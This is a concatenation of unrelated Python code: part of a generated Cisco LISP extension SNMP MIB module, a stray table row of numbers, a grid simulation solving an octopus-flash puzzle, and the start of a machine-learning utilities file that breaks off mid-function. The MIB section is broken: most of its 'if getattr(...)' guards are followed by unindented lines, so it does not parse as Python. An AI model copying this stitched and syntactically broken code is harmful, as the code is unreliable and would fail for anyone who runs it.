if mibBuilder.loadTexts: clispExtEidRegFailureCause.setDescription("This object indicates the cause of the map registration failure on the map-server. 'noEidPrefixConfiguration' No site configuration to accept registration for EID prefix. 'authenticationFailure' Failed to authenticate map-register for EID prefix. 'allowedLocatorMismatch' map-register contains RLOC that is not in the site's allowed locator list.")
clispExtEidRegMapRequestDroppedCause = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 6, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("malformedRequest", 1), ("noMatchingEidRegistration", 2), ("allowedLocatorPolicyViolation", 3)))).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: clispExtEidRegMapRequestDroppedCause.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMapRequestDroppedCause.setDescription("This object indicates the cause of the map-request drop on the map-resolver. 'malformedRequest' map-request is not valid. 'noMatchingEidRegistration' could not find matching EID registration for the map-request. 'allowedLocatorPolicyViolation' map request does not conform to the configured allowed-locator policy.")
# --- Scalars .1.7: global accept-more-specific counters ----------------------
clispExtGlobalObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7))
clispExtEidRegMoreSpecificWarningThreshold = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 1), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThreshold.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThreshold.setDescription('This object indicates the warning threshold for the accept-more-specific registration count on the map-server. This warning threshold is applicable to all EID instances.')
clispExtEidRegMoreSpecificLimit = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 2), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimit.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimit.setDescription('This object indicates the accept-more-specific registration limit on the map-server. This is applicable to all EID instances.')
clispExtEidRegMoreSpecificCount = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 825, 1, 7, 3), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificCount.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificCount.setDescription('This object indicates the number of map registrations accepted as a result of accept-more-specific configuration. This is applicable to all EID instances.')
# --- Notifications (.0.1 through .0.14) --------------------------------------
# Trap definitions; each lists the varbind objects attached to the trap.
clispExtUseMapResolverStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 1)).setObjects(("LISP-MIB", "lispUseMapResolverState"))
if mibBuilder.loadTexts: clispExtUseMapResolverStateChange.setStatus('current')
if mibBuilder.loadTexts: clispExtUseMapResolverStateChange.setDescription('The device generates this notification when the map-resolver reachability state changes. The lispUseMapResolverAddressLength and lispUseMapResolverAddress values are attached to the notification object ID.')
clispExtReliableTransportStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionState"))
if mibBuilder.loadTexts: clispExtReliableTransportStateChange.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportStateChange.setDescription('The device generates this notification when the reliable transport session state changes. The clispReliableTransportSessionPeerAddressLength, clispReliableTransportSessionPeerAddress, clispReliableTransportSessionPeerPort, clispReliableTransportSessionLocalAddressLength, clispReliableTransportSessionLocalAddress, clispReliableTransportSessionLocalPort values are attached to the notification object ID.')
clispExtMappingDatabaseEidRegFailure = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 3)).setObjects(("LISP-MIB", "lispMappingDatabaseTimeStamp"), ("LISP-MIB", "lispUseMapServerState"))
if mibBuilder.loadTexts: clispExtMappingDatabaseEidRegFailure.setStatus('current')
if mibBuilder.loadTexts: clispExtMappingDatabaseEidRegFailure.setDescription('The device generates this notification when the xTR fails to register a database mapping with the map-server. The lispMappingDatabaseEidLength, lispMappingDatabaseEid, lispUseMapServerAddressLength, lispUseMapServerAddress values are attached to the notification object ID.')
clispExtUseMapServerStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 4)).setObjects(("LISP-MIB", "lispUseMapServerState"))
if mibBuilder.loadTexts: clispExtUseMapServerStateChange.setStatus('current')
if mibBuilder.loadTexts: clispExtUseMapServerStateChange.setDescription('The device generates this notification when the map-server reachability state changes. The lispUseMapServerAddressLength and lispUseMapServerAddress values are attached to the notification object ID.')
clispExtUseProxyEtrStateChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 5)).setObjects(("LISP-MIB", "lispUseProxyEtrState"))
if mibBuilder.loadTexts: clispExtUseProxyEtrStateChange.setStatus('current')
if mibBuilder.loadTexts: clispExtUseProxyEtrStateChange.setDescription('The device generates this notification when the proxy ETR reachability state changes. The lispUseProxyEtrAddressLength and lispUseProxyEtrAddress values are attached to the notification object ID.')
clispExtEidRegSiteAllRegistrationsExpired = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 6)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName"))
if mibBuilder.loadTexts: clispExtEidRegSiteAllRegistrationsExpired.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegSiteAllRegistrationsExpired.setDescription('The device generates this notification when all the registration for a site expires on the map-server. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID.')
clispExtEidRegFailure = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 7)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegFailureCause"))
if mibBuilder.loadTexts: clispExtEidRegFailure.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegFailure.setDescription('The device generates this notification when the map-server fails to accept a map registration. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID. If clispExtEidRegFailureCause value is noEidPrefixConfiguration(1) the lispEidRegistrationSiteName object in the notification will be empty.')
clispExtFeaturesEidRegMoreSpecificLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 8)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimit"))
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimitReached.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificLimitReached.setDescription('The device generates this notification when the map-server has reached the limit of the number of map registrations it can accept as a result of the accept-more-specific configuration. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.')
clispExtFeaturesEidRegMoreSpecificWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 9)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThreshold"))
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThresholdReached.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesEidRegMoreSpecificWarningThresholdReached.setDescription('The device generates this notification when the map-server has reached the threshold of the number of map registrations it can accept as a result of accept-more-specific configuration. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.')
clispExtEidRegMapRequestDropped = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 10)).setObjects(("LISP-MIB", "lispEidRegistrationSiteName"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDroppedCause"))
if mibBuilder.loadTexts: clispExtEidRegMapRequestDropped.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMapRequestDropped.setDescription('The device generates this notification when the map-resolver drops a map-request because the map-request does not conform to configured policy. The lispEidRegistrationEidLength and lispEidRegistrationEid values are attached to the notification object ID.')
clispExtEidRegMoreSpecificLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 11)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit"))
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimitReached.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificLimitReached.setDescription('The device generates this notification when the map-server has reached the limit of the number of map registrations it can accept as a result of the accept-more-specific configuration. This notification is router LISP instance specific.')
clispExtEidRegMoreSpecificWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 12)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold"))
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThresholdReached.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificWarningThresholdReached.setDescription('The device generates this notification when the map-server has reached the threshold of the number of map registrations it can accept as a result of accept-more-specific configuration. This notification is router LISP instance specific.')
clispExtFeaturesMapCacheLimitReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 13)).setObjects(("LISP-MIB", "lispFeaturesMapCacheLimit"))
if mibBuilder.loadTexts: clispExtFeaturesMapCacheLimitReached.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesMapCacheLimitReached.setDescription('The device generates this notification when the xTR has reached the limit of the number of map-cache it can create. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.')
clispExtFeaturesMapCacheWarningThresholdReached = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 825, 0, 14)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThreshold"))
if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThresholdReached.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesMapCacheWarningThresholdReached.setDescription('The device generates this notification when the xTR has reached the threshold of the number of map-cache it can create. This notification is instance specific. The lispFeaturesInstanceID and lispFeaturesAddressFamily values are attached to the notification object ID.')
# --- Conformance (.2) --------------------------------------------------------
# Groups referenced by the compliance statement are presumably defined
# further down in the generated file (past this excerpt).
ciscoLispExtCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1))
ciscoLispExtGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2))
ciscoLispExtMIBComplianceAll = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1, 1)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipGroup"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationSupportGroup"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificValuesGroup"))
# setStatus on ModuleCompliance is only available on newer pysnmp builds.
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    ciscoLispExtMIBComplianceAll = ciscoLispExtMIBComplianceAll.setStatus('current')
if mibBuilder.loadTexts: ciscoLispExtMIBComplianceAll.setDescription('Compliance requirement for implementations of CISCO-LISP-EXT-MIB by all LISP (P)xTR devices. Map-server database of gleaned RLOC addresses only need to be supported on LISP Map Server.')
ciscoLispExtMIBComplianceMapServer = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 1, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipGroup"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsGroup"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesGroup"), ("CISCO-LISP-EXT-MIB", "clispExtNotificationSupportGroup"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificValuesGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoLispExtMIBComplianceMapServer = ciscoLispExtMIBComplianceMapServer.setStatus('current')
if mibBuilder.loadTexts: ciscoLispExtMIBComplianceMapServer.setDescription('Compliance requirement for implementations of CISCO-LISP-EXT-MIB by LISP Map Server devices.')
clispExtNotificationsGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 1)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtUseMapResolverStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtMappingDatabaseEidRegFailure"), ("CISCO-LISP-EXT-MIB", "clispExtUseMapServerStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtUseProxyEtrStateChange"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegSiteAllRegistrationsExpired"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegFailure"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThresholdReached"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDropped"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThresholdReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheLimitReached"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThresholdReached"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtNotificationsGroup = clispExtNotificationsGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtNotificationsGroup.setDescription('Objects required for LISP notifications.')
clispExtEidRegRlocMembershipGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 2)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipMemberSince"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipGleaned"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegRlocMembershipConfigured"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtEidRegRlocMembershipGroup = clispExtEidRegRlocMembershipGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegRlocMembershipGroup.setDescription('A collection of objects to support reporting MapServer database of RLOC membership.')
clispExtRlocMembershipGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 3)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipMemberSince"), ("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipDiscovered"), ("CISCO-LISP-EXT-MIB", "clispExtRlocMembershipConfigured"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtRlocMembershipGroup = clispExtRlocMembershipGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtRlocMembershipGroup.setDescription('A collection of objects to support reporting RLOC membership information.')
clispExtReliableTransportSessionGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 4)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionState"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionLastStateChangeTime"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionEstablishmentRole"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionMessagesIn"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionMessagesOut"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionBytesIn"), ("CISCO-LISP-EXT-MIB", "clispExtReliableTransportSessionBytesOut"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtReliableTransportSessionGroup = clispExtReliableTransportSessionGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtReliableTransportSessionGroup.setDescription('A collection of objects to support reporting \\ ReliableTransportSession information.')
clispExtGlobalStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 5)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtGlobalStatsEidRegMoreSpecificEntryCount"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtGlobalStatsGroup = clispExtGlobalStatsGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtGlobalStatsGroup.setDescription('A collection of objects to support reporting \\ Cisco define augments to the lispGlobalStatsTable')
clispExtFeaturesGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 6)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesEidRegMoreSpecificLimit"), ("CISCO-LISP-EXT-MIB", "clispExtFeaturesMapCacheWarningThreshold"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtFeaturesGroup = clispExtFeaturesGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtFeaturesGroup.setDescription('A collection of objects to support reporting \\ Cisco define augments to the lispFeaturesTable.')
clispExtNotificationSupportGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 7)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegFailureCause"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMapRequestDroppedCause"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtNotificationSupportGroup = clispExtNotificationSupportGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtNotificationSupportGroup.setDescription('A collection of objects to be supplied within notifications.')
clispExtEidRegMoreSpecificValuesGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 825, 2, 2, 8)).setObjects(("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificWarningThreshold"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificLimit"), ("CISCO-LISP-EXT-MIB", "clispExtEidRegMoreSpecificCount"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
clispExtEidRegMoreSpecificValuesGroup = clispExtEidRegMoreSpecificValuesGroup.setStatus('current')
if mibBuilder.loadTexts: clispExtEidRegMoreSpecificValuesGroup.setDescription('A collection of objects to be supplied within notifications.')
mibBuilder.exportSymbols("CISCO-LISP-EXT-MIB", clispExtReliableTransportSessionLocalPort=clispExtReliableTransportSessionLocalPort, clispExtReliableTransportSessionEntry=clispExtReliableTransportSessionEntry, clispExtNotificationObjects=clispExtNotificationObjects, clispExtFeaturesEntry=clispExtFeaturesEntry, clispExtFeaturesMapCacheLimitReached=clispExtFeaturesMapCacheLimitReached, clispExtMappingDatabaseEidRegFailure=clispExtMappingDatabaseEidRegFailure, clispExtGlobalStatsEntry=clispExtGlobalStatsEntry, clispExtEidRegRlocMembershipConfigured=clispExtEidRegRlocMembershipConfigured, clispExtEidRegRlocMembershipRloc=clispExtEidRegRlocMembershipRloc, clispExtGlobalStatsEidRegMoreSpecificEntryCount=clispExtGlobalStatsEidRegMoreSpecificEntryCount, clispExtGlobalStatsGroup=clispExtGlobalStatsGroup, clispExtFeaturesEidRegMoreSpecificWarningThreshold=clispExtFeaturesEidRegMoreSpecificWarningThreshold, clispExtNotificationSupportGroup=clispExtNotificationSupportGroup, clispExtUseProxyEtrStateChange=clispExtUseProxyEtrStateChange, clispExtUseMapResolverStateChange=clispExtUseMapResolverStateChange, clispExtRlocMembershipTable=clispExtRlocMembershipTable, ciscoLispExtMIBComplianceMapServer=ciscoLispExtMIBComplianceMapServer, ciscoLispExtConformance=ciscoLispExtConformance, ciscoLispExtMIB=ciscoLispExtMIB, clispExtRlocMembershipGroup=clispExtRlocMembershipGroup, clispExtEidRegRlocMembershipEidAfi=clispExtEidRegRlocMembershipEidAfi, clispExtReliableTransportSessionTable=clispExtReliableTransportSessionTable, clispExtFeaturesEidRegMoreSpecificWarningThresholdReached=clispExtFeaturesEidRegMoreSpecificWarningThresholdReached, clispExtReliableTransportSessionPeerAddressLength=clispExtReliableTransportSessionPeerAddressLength, clispExtEidRegMoreSpecificLimitReached=clispExtEidRegMoreSpecificLimitReached, clispExtFeaturesMapCacheWarningThresholdReached=clispExtFeaturesMapCacheWarningThresholdReached, clispExtRlocMembershipEidAfi=clispExtRlocMembershipEidAfi, 
clispExtEidRegMoreSpecificCount=clispExtEidRegMoreSpecificCount, clispExtEidRegMoreSpecificWarningThresholdReached=clispExtEidRegMoreSpecificWarningThresholdReached, clispExtRlocMembershipInstanceID=clispExtRlocMembershipInstanceID, clispExtEidRegMoreSpecificValuesGroup=clispExtEidRegMoreSpecificValuesGroup, clispExtReliableTransportSessionEstablishmentRole=clispExtReliableTransportSessionEstablishmentRole, clispExtRlocMembershipRlocLength=clispExtRlocMembershipRlocLength, clispExtReliableTransportSessionState=clispExtReliableTransportSessionState, clispExtFeaturesEidRegMoreSpecificLimit=clispExtFeaturesEidRegMoreSpecificLimit, clispExtEidRegRlocMembershipEntry=clispExtEidRegRlocMembershipEntry, clispExtRlocMembershipDiscovered=clispExtRlocMembershipDiscovered, clispExtEidRegFailure=clispExtEidRegFailure, clispExtReliableTransportSessionMessagesOut=clispExtReliableTransportSessionMessagesOut, clispExtRlocMembershipEntry=clispExtRlocMembershipEntry, ciscoLispExtCompliances=ciscoLispExtCompliances, clispExtReliableTransportSessionPeerPort=clispExtReliableTransportSessionPeerPort, clispExtEidRegRlocMembershipRlocLength=clispExtEidRegRlocMembershipRlocLength, ciscoLispExtNotifications=ciscoLispExtNotifications, clispExtRlocMembershipConfigured=clispExtRlocMembershipConfigured, clispExtFeaturesMapCacheWarningThreshold=clispExtFeaturesMapCacheWarningThreshold, clispExtNotificationsGroup=clispExtNotificationsGroup, clispExtUseMapServerStateChange=clispExtUseMapServerStateChange, clispExtEidRegMapRequestDropped=clispExtEidRegMapRequestDropped, clispExtReliableTransportStateChange=clispExtReliableTransportStateChange, clispExtGlobalObjects=clispExtGlobalObjects, clispExtReliableTransportSessionLocalAddressLength=clispExtReliableTransportSessionLocalAddressLength, clispExtEidRegRlocMembershipTable=clispExtEidRegRlocMembershipTable, clispExtEidRegMoreSpecificLimit=clispExtEidRegMoreSpecificLimit, 
clispExtEidRegSiteAllRegistrationsExpired=clispExtEidRegSiteAllRegistrationsExpired, clispExtEidRegRlocMembershipGroup=clispExtEidRegRlocMembershipGroup, clispExtReliableTransportSessionPeerAddress=clispExtReliableTransportSessionPeerAddress, clispExtFeaturesTable=clispExtFeaturesTable, clispExtFeaturesGroup=clispExtFeaturesGroup, ciscoLispExtGroups=ciscoLispExtGroups, clispExtEidRegMapRequestDroppedCause=clispExtEidRegMapRequestDroppedCause, clispExtEidRegFailureCause=clispExtEidRegFailureCause, clispExtReliableTransportSessionLastStateChangeTime=clispExtReliableTransportSessionLastStateChangeTime, clispExtEidRegRlocMembershipGleaned=clispExtEidRegRlocMembershipGleaned, clispExtEidRegRlocMembershipInstanceID=clispExtEidRegRlocMembershipInstanceID, clispExtRlocMembershipMemberSince=clispExtRlocMembershipMemberSince, clispExtReliableTransportSessionBytesOut=clispExtReliableTransportSessionBytesOut, ciscoLispExtObjects=ciscoLispExtObjects, clispExtReliableTransportSessionBytesIn=clispExtReliableTransportSessionBytesIn, PYSNMP_MODULE_ID=ciscoLispExtMIB, clispExtEidRegRlocMembershipMemberSince=clispExtEidRegRlocMembershipMemberSince, clispExtReliableTransportSessionGroup=clispExtReliableTransportSessionGroup, clispExtReliableTransportSessionLocalAddress=clispExtReliableTransportSessionLocalAddress, clispExtGlobalStatsTable=clispExtGlobalStatsTable, clispExtRlocMembershipRloc=clispExtRlocMembershipRloc, ciscoLispExtMIBComplianceAll=ciscoLispExtMIBComplianceAll, clispExtFeaturesEidRegMoreSpecificLimitReached=clispExtFeaturesEidRegMoreSpecificLimitReached, clispExtReliableTransportSessionMessagesIn=clispExtReliableTransportSessionMessagesIn, clispExtEidRegMoreSpecificWarningThreshold=clispExtEidRegMoreSpecificWarningThreshold)
| 46,214 | 16,242 |
import sys
import numpy as np
# Read the whole puzzle input from stdin.
raw = sys.stdin.read()
# Parse into a 2-D integer grid: one digit per cell, one row per non-empty line.
# NOTE(review): `map` shadows the builtin of the same name; kept as-is because
# the simulation loop below refers to this global.
map = np.array([[c for c in l] for l in raw.split('\n') if len(l) != 0], dtype=int)
def energize(map, i, j):
    """Give octopus (i, j) one unit of energy and cascade flashes in place.

    Out-of-bounds coordinates and cells that already flashed this step
    (value >= 10) are ignored.  When a cell reaches 10 it "flashes" and
    energizes all eight neighbours recursively.
    """
    inside = 0 <= i < map.shape[0] and 0 <= j < map.shape[1]
    if not inside or map[i, j] >= 10:
        return
    map[i, j] += 1
    if map[i, j] >= 10:
        # A flash energizes every surrounding cell (diagonals included).
        for di in (-1, 0, 1):
            for dj in (-1, 0, 1):
                if di or dj:
                    energize(map, i + di, j + dj)
flashes = 0
# Run 100 simulation steps: each step every octopus gains one energy unit
# (with cascading flashes handled inside energize), then every cell that
# reached 10+ is counted as a flash and reset to 0 for the next step.
for _ in range(100):
    for i in range(map.shape[0]):
        for j in range(map.shape[1]):
            energize(map, i, j)
    # All cells >= 10 flashed during this step.
    flashes += (map >= 10).sum()
    map[map >= 10] = 0
print('Result:', flashes)
| 678 | 295 |
from __future__ import print_function
from collections import OrderedDict, defaultdict
import numpy as np
import random
import copy
#from mpi_util import mpi_moments
#def fc(x, scope, nh, *, init_scale=1.0, init_bias=0.0):
# with tf.variable_scope(scope):
# nin = x.get_shape()[1].value
# w = tf.get_variable("w", [nin, nh], initializer=ortho_init(init_scale))
# b = tf.get_variable("b", [nh], initializer=tf.constant_initializer(init_bias))
# return tf.matmul(x, w)+b
#
#def conv(x, scope, *, nf, rf, stride, pad='VALID', init_scale=1.0, data_format='NHWC', one_dim_bias=False, bias_initializer=tf.constant_initializer(0.0)):
# if data_format == 'NHWC':
# channel_ax = 3
# strides = [1, stride, stride, 1]
# bshape = [1, 1, 1, nf]
# elif data_format == 'NCHW':
# channel_ax = 1
# strides = [1, 1, stride, stride]
# bshape = [1, nf, 1, 1]
# else:
# raise NotImplementedError
# bias_var_shape = [nf] if one_dim_bias else [1, nf, 1, 1]
# nin = x.get_shape()[channel_ax].value
# wshape = [rf, rf, nin, nf]
# with tf.variable_scope(scope):
# w = tf.get_variable("w", wshape, initializer=ortho_init(init_scale))
# b = tf.get_variable("b", bias_var_shape, initializer=bias_initializer)
# if not one_dim_bias and data_format == 'NHWC':
# b = tf.reshape(b, bshape)
# return b + tf.nn.conv2d(x, w, strides=strides, padding=pad, data_format=data_format)
#
#
#def deconv(x, scope, *, nf, rf, stride, init_scale=1.0, data_format='NHWC'):
# if data_format == 'NHWC':
# channel_ax = 3
# strides = (stride, stride)
# #strides = [1, stride, stride, 1]
# elif data_format == 'NCHW':
# channel_ax = 1
# strides = (stride, stride)
# #strides = [1, 1, stride, stride]
# else:
# raise NotImplementedError
#
# with tf.variable_scope(scope):
# out = tf.contrib.layers.conv2d_transpose(x,
# num_outputs=nf,
# kernel_size=rf,
# stride=strides,
# padding='VALID',
# weights_initializer=ortho_init(init_scale),
# biases_initializer=tf.constant_initializer(0.0),
# activation_fn=None,
# data_format=data_format)
# return out
#
#
#def ortho_init(scale=1.0):
# def _ortho_init(shape, dtype, partition_info=None):
# #lasagne ortho init for tf
# shape = tuple(shape)
# if len(shape) == 2:
# flat_shape = shape
# elif len(shape) == 4: # assumes NHWC
# flat_shape = (np.prod(shape[:-1]), shape[-1])
# else:
# raise NotImplementedError
# a = np.random.normal(0.0, 1.0, flat_shape)
# u, _, v = np.linalg.svd(a, full_matrices=False)
# q = u if u.shape == flat_shape else v # pick the one with the correct shape
# q = q.reshape(shape)
# return (scale * q[:shape[0], :shape[1]]).astype(np.float32)
# return _ortho_init
def tile_images(array, n_cols=None, max_images=None, div=1):
    """Arrange a batch of images into one large tiled image.

    :param array: batch of shape (N, H, W) or (N, H, W, C); a trailing
        singleton channel is squeezed to grayscale
    :param n_cols: number of tiles per row; derived from sqrt(N) (rounded to a
        multiple of `div`) when omitted
    :param max_images: optional cap on how many images from the batch are used
    :param div: granularity for the automatic column count
    :return: a single array with the images laid out on a grid; missing grid
        slots are filled with zeros
    """
    if max_images is not None:
        array = array[:max_images]
    # Squeeze (N, H, W, 1) down to grayscale (N, H, W).
    if len(array.shape) == 4 and array.shape[3] == 1:
        array = array[:, :, :, 0]
    assert len(array.shape) in [3, 4], "wrong number of dimensions - shape {}".format(array.shape)
    if len(array.shape) == 4:
        assert array.shape[3] == 3, "wrong number of channels- shape {}".format(array.shape)
    if n_cols is None:
        n_cols = max(int(np.sqrt(array.shape[0])) // div * div, div)
    n_rows = int(np.ceil(float(array.shape[0]) / n_cols))
    # Zero tile used to pad the last row when N is not a multiple of n_cols.
    blank = np.zeros(array[0].shape)

    def tile_at(flat_index):
        return array[flat_index] if flat_index < array.shape[0] else blank

    rows = [
        np.concatenate([tile_at(r * n_cols + c) for c in range(n_cols)], axis=1)
        for r in range(n_rows)
    ]
    return np.concatenate(rows, axis=0)
def set_global_seeds(i):
    """Seed every RNG the project uses: TensorFlow (if installed), NumPy, stdlib random.

    :param i: integer seed applied to all generators
    """
    try:
        import tensorflow as tf
    except ImportError:
        # TensorFlow is optional; silently skip when it is not installed.
        pass
    else:
        try:
